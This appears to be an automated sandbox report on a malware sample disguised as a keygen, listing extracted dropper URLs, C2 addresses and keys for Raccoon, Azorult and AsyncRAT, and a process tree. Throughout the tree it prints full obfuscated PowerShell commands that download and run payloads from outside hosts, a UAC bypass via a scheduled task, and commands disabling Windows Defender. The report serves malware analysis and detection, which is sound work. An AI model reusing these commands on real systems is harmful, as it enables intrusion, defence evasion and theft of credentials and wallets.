Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
1803s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 14:18
General
-
Target
Keygen.bin.exe
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhHT
exe.dropper
http://bit.do/fqhHT
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://zxvbcrt.ug/zxcvb.exe
exe.dropper
http://zxvbcrt.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJv
exe.dropper
http://bit.do/fqhJv
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://pdshcjvnv.ug/zxcvb.exe
exe.dropper
http://pdshcjvnv.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJD
exe.dropper
http://bit.do/fqhJD
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://rbcxvnb.ug/zxcvb.exe
exe.dropper
http://rbcxvnb.ug/zxcvb.exe
Extracted
Family
raccoon
Botnet
c6f4c67877b4427c759f396ca4c1dff4761d3cc9
Attributes
-
url4cnc
https://telete.in/brikitiki
rc4.plain
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
asyncrat
Version
0.5.7B
C2
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
Mutex
AsyncMutex_6SI8OkPnk
Attributes
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
aes.plain
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Async RAT payload 3 IoCs
-
ModiLoader First Stage 2 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 34 IoCs
-
Loads dropped DLL 18 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
-
Suspicious use of SetThreadContext 12 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 4 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\797B.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\797B.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\pnc.exe"C:\Users\Public\pnc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"7⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4688 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\468043462435068\\* & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 46889⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Public\pnc.exe"C:\Users\Public\pnc.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\Yms5gMrn3A.exe"C:\Users\Admin\AppData\Local\Temp\Yms5gMrn3A.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\kNhjQtso.bat" "9⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\kNhjQtso.bat" "9⤵
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\joazwkiz.inf9⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\pnc.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ldz.exe"C:\Users\Public\ldz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5152 & erase C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe & RD /S /Q C:\\ProgramData\\248482891706359\\* & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 515210⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"{path}"7⤵
- Executes dropped EXE
-
-
-
C:\Users\Public\ldz.exe"{path}"6⤵
- Executes dropped EXE
-
-
C:\Users\Public\ldz.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\v15Xka8Ssx.exe"C:\Users\Admin\AppData\Local\Temp\v15Xka8Ssx.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xxs1lihx.inf9⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\ldz.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\adv.exe"C:\Users\Public\adv.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\s4drbjpj.exe2⤵
-
C:\Windows\temp\s4drbjpj.exeC:\Windows\temp\s4drbjpj.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
